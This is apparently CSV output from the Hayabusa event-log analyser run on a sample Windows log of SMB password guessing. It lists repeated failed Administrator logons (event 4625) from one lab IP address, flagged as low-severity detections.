2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
